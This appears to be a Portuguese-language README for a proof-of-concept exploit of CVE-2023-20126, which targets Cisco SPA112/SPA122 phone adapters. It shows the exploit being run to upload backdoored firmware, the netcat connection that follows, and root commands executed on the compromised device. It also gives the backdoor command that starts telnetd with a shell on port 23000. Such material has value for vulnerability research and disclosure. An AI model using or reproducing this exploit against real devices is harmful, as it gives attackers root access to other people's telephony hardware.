
Exploit de prova de conceito para CVE-2023-20126 visando adaptadores telefônicos Cisco SPA. Carrega firmware malicioso para obter um shell root na porta 23000/tcp via telnetd.
Mínimo Viável PoC para CVE-2023-20126
Esta é a versão inicial. Funciona, mas é o exploit do 'caso mais simples'.
Testado e funcionando no SPA112/SPA122 - SPA232D requer uma imagem de firmware diferente.
Fornece um root-shell na porta 23000/tcp.
Ainda preciso limpar o toolchain usado para editar o firmware e provavelmente colocarei isso em um repositório diferente. É baseado principalmente no trabalho de @BigNerd95, mas com pequenas alterações para funcionar nos arquivos de firmware SPA112/122.
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
telnetd -l /bin/sh -p 23000, fornecendo um root shell na porta 23000/tcp. Baseado no trabalho de bignerd95.WTFPL.
use o git issue.
Se isso queimar o seu maldito dispositivo, eu não assumo nenhuma responsabilidade.
Esse é SEU problema.
Quer dizer, eu montei esse firmware com backdoor em uma noite.
Além disso, por que você não está seguindo o tutorial e construindo seu próprio firmware com backdoor?